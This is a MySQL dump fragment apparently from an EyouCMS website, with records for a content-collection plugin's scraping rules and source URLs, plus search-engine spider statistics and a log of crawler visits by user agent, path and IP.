INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('301', '4', 'add_time', '新增时间', '', '', '', '', '0', '1589330918', '1589330918');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('297', '4', 'litpic', '缩略图', '', '', '', '', '0', '1589330918', '1589330918');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('298', '4', 'seo_title', 'SEO标题', '', '', '', '', '0', '1589330918', '1589330918');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('296', '4', 'content', '内容详情', '<div class="InfoContent">[内容]<div class="Tag">', '', '', '', '1', '1589330918', '1589330918');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('295', '4', 'title', '标题', '<div class="InfoTitle"><h1>[内容]</h1></div>\r\n', '东莞', '', '', '0', '1589330918', '1589330918');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('351', '2', 'add_time', '新增时间', '', '', '', '', '0', '1589338310', '1589338310');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('350', '2', 'seo_description', 'SEO描述', '', '', '', '', '0', '1589338310', '1589338310');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('346', '2', 'content', '内容详情', '<div class="clearfix">[内容]</div>\r\n', '', '', '', '1', '1589338310', '1589338310');
INSERT INTO `ey_weapp_sitecollet_rule` VALUES ('345', '2', 'title', '标题', '<h1>\r\n [内容]\r\n </h1>', '', '', '', '0', '1589338310', '1589338310');
-- -----------------------------
-- Table structure for `ey_weapp_sitecollet_urllist`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_sitecollet_urllist`;
CREATE TABLE `ey_weapp_sitecollet_urllist` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`collectid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '采集列表id',
`url` varchar(512) NOT NULL DEFAULT '' COMMENT '文章url',
`add_time` int(11) unsigned DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) unsigned DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `collectid` (`collectid`)
) ENGINE=MyISAM AUTO_INCREMENT=63 DEFAULT CHARSET=utf8 COMMENT='文章采集链接列表';
-- -----------------------------
-- Records of `ey_weapp_sitecollet_urllist`
-- -----------------------------
INSERT INTO `ey_weapp_sitecollet_urllist` VALUES ('37', '1', 'http://www.zzfrjt.com/nba/index_3.html', '1589179925', '1589179925');
INSERT INTO `ey_weapp_sitecollet_urllist` VALUES ('38', '1', 'http://www.zzfrjt.com/nba/index_2.html', '1589179925', '1589179925');
INSERT INTO `ey_weapp_sitecollet_urllist` VALUES ('62', '2', 'https://www.eyoucms.com/moban/list_3_21.html', '1589338258', '1589338258');
INSERT INTO `ey_weapp_sitecollet_urllist` VALUES ('61', '4', 'https://www.shwlz.com/faq.html?pagesize=20&p=1', '1589330889', '1589330889');
-- -----------------------------
-- Table structure for `ey_weapp_spider_tongji`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_spider_tongji`;
CREATE TABLE `ey_weapp_spider_tongji` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`spider` int(10) NOT NULL DEFAULT '0' COMMENT '蜘蛛分类',
`total` int(10) NOT NULL DEFAULT '0' COMMENT '蜘蛛统计',
`month` int(10) NOT NULL DEFAULT '0' COMMENT '最近30天',
`week` int(10) NOT NULL DEFAULT '0' COMMENT '当周',
`pre_week` int(10) NOT NULL DEFAULT '0' COMMENT '上一周',
`day` int(10) NOT NULL DEFAULT '0' COMMENT '当天',
`pre_day` int(10) NOT NULL DEFAULT '0' COMMENT '昨天',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `spider` (`spider`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_weapp_spider_tongji`
-- -----------------------------
INSERT INTO `ey_weapp_spider_tongji` VALUES ('1', '99', '45152', '2814', '329', '722', '101', '136', '1603780570', '1662512757');
INSERT INTO `ey_weapp_spider_tongji` VALUES ('2', '3', '5473', '171', '15', '31', '2', '8', '1603784549', '1662506860');
INSERT INTO `ey_weapp_spider_tongji` VALUES ('3', '1', '32000', '1058', '76', '350', '17', '32', '1603785024', '1662509317');
INSERT INTO `ey_weapp_spider_tongji` VALUES ('4', '4', '727', '45', '10', '8', '2', '3', '1603787463', '1662129759');
INSERT INTO `ey_weapp_spider_tongji` VALUES ('5', '2', '13726', '771', '68', '188', '16', '23', '1603802050', '1662512792');
INSERT INTO `ey_weapp_spider_tongji` VALUES ('6', '6', '2097', '156', '15', '28', '3', '8', '1604092131', '1662510966');
-- -----------------------------
-- Table structure for `ey_weapp_spider_visit`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_spider_visit`;
CREATE TABLE `ey_weapp_spider_visit` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`spider` int(10) DEFAULT '0' COMMENT '蜘蛛分类',
`useragent` varchar(500) DEFAULT '' COMMENT '蜘蛛标识',
`url` varchar(500) DEFAULT '' COMMENT '抓取的URL',
`ip` varchar(20) DEFAULT '' COMMENT '蜘蛛ip',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `spider` (`spider`)
) ENGINE=MyISAM AUTO_INCREMENT=99213 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_weapp_spider_visit`
-- -----------------------------
INSERT INTO `ey_weapp_spider_visit` VALUES ('95066', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '58.250.125.149', '1660606159', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95075', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/436.html', '185.191.171.4', '1660611263', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95076', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/92.html', '216.244.66.194', '1660612094', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95065', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/75.html?admin_id=1', '185.191.171.17', '1660604867', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95059', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/434.html', '114.119.151.153', '1660600757', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95058', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/356.html', '185.191.171.25', '1660600355', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95060', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/324.html', '185.191.171.2', '1660601022', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95071', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_35/', '185.191.171.43', '1660609228', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95054', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/398.html', '114.119.151.155', '1660599909', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95051', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/113.html', '185.191.171.44', '1660598846', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95056', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/402.html', '114.119.151.153', '1660600192', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95055', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ays.html', '114.119.151.155', '1660600062', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95050', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_5.html', '185.191.171.34', '1660598636', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95049', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.108', '1660597101', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95044', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '112.104.136.126', '1660594817', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95041', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tuobengal/', '185.191.171.45', '1660594109', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95039', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660593044', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95007', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660578713', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95006', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660578635', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95010', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/30.html', '66.249.79.108', '1660580967', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95015', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/117.html', '66.249.79.108', '1660583083', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95036', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_13.html', '220.181.108.84', '1660592944', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94996', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/328.html', '54.153.108.14', '1660571298', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95064', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1660603054', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95067', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_3.html', '185.191.171.25', '1660606194', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94989', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/324.html', '54.177.40.112', '1660571297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94993', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/69.html', '50.18.245.229', '1660571297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94982', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/82.html', '54.176.63.34', '1660571297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94991', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/70.html', '13.57.203.132', '1660571297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94984', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/contact/', '54.215.204.131', '1660571297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94985', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/331.html', '52.53.126.52', '1660571297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94983', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/368.html', '54.153.40.255', '1660571297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94987', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/about/', '13.52.186.233', '1660571297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94978', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/', '54.193.30.147', '1660571295', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95070', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/446.html', '207.46.13.215', '1660608207', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95072', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660609309', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94986', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/339.html', '184.169.253.136', '1660571297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94974', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/123.html', '116.179.32.197', '1660568400', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94995', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/81.html', '54.183.174.116', '1660571298', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95062', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.149', '1660602043', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95063', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/209.html', '114.119.151.153', '1660602112', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95046', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/369.html', '116.179.32.96', '1660595750', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95048', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/157.html', '185.191.171.37', '1660596700', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95057', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/84.html', '114.119.151.155', '1660600334', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95061', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/hb.html', '114.119.151.155', '1660601270', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95052', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/77.html', '114.119.151.155', '1660599281', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95053', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1660599484', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94992', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/327.html', '3.101.105.241', '1660571297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94964', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/24_4.html', '185.191.171.18', '1660562022', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94962', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/223.html', '220.181.108.112', '1660561036', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94963', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/409.html', '114.119.151.155', '1660561163', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94958', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/97.html', '116.179.32.25', '1660558582', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94961', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/95.html', '114.119.151.153', '1660559835', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94957', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/20.html', '114.119.151.155', '1660558058', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94954', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/107.html', '114.119.151.153', '1660557237', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94959', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/207.html', '114.119.151.153', '1660559421', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94960', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/113.html', '114.119.151.155', '1660559589', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94948', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/jbzxw/', '220.181.108.104', '1660555233', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94950', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/qingyang.html', '114.119.151.155', '1660555676', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94949', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/310.html', '114.119.151.155', '1660555379', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94951', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_64/', '114.119.151.153', '1660555903', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94953', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/405.html', '114.119.151.153', '1660556725', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94952', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bcxw/list_19_4/', '114.119.151.155', '1660556033', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94940', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.40', '1660550897', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94956', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/czs.html', '114.119.151.155', '1660557925', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95110', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ganshusheng.html', '114.119.151.155', '1660627089', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95135', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/451.html', '216.244.66.194', '1660635190', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94937', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.203', '1660549545', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94936', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/135.html', '185.191.171.4', '1660547133', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95115', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/483.html', '185.191.171.33', '1660628353', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95116', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/104.html', '185.191.171.6', '1660628565', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95118', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/398.html', '114.119.151.153', '1660628620', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95119', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/20_4.html', '185.191.171.33', '1660628807', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95121', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/110.html', '114.119.151.155', '1660630561', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95143', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_21.html', '185.191.171.45', '1660640687', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95123', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_25/', '114.119.151.155', '1660630755', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95124', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/235.html', '114.119.151.153', '1660630884', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94933', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.21.95', '1660545981', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94934', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/82.html', '116.179.32.233', '1660546111', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95130', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/450.html', '216.244.66.194', '1660632882', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94938', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_26.html', '185.191.171.23', '1660550225', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94943', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/37_3.html', '185.191.171.26', '1660551395', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94941', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bcxw/list_19_3/', '185.191.171.23', '1660550948', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94945', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/34_2.html', '185.191.171.40', '1660552394', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94947', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '42.236.10.74', '1660552847', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94955', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_29/', '114.119.151.153', '1660557392', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95163', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660650177', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95165', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zy.html', '114.119.151.153', '1660650848', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95185', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/432.html', '185.191.171.8', '1660659864', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95074', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/31_10.html', '185.191.171.23', '1660610264', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95162', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/4.html', '66.249.79.110', '1660650130', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94971', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.117', '1660566536', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95034', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/342.html', '220.181.108.80', '1660592944', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95073', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/75.html', '116.179.32.228', '1660609709', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95161', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '59.60.178.172', '1660649473', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95182', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_17.html', '185.191.171.10', '1660658712', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95013', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.110', '1660582193', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95014', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/bengche/', '66.249.79.112', '1660582794', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94932', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.110', '1660545513', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94930', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/56.html', '185.191.171.14', '1660544061', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94931', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/22_3.html', '185.191.171.6', '1660544755', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94935', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '125.224.181.99', '1660546150', '0');
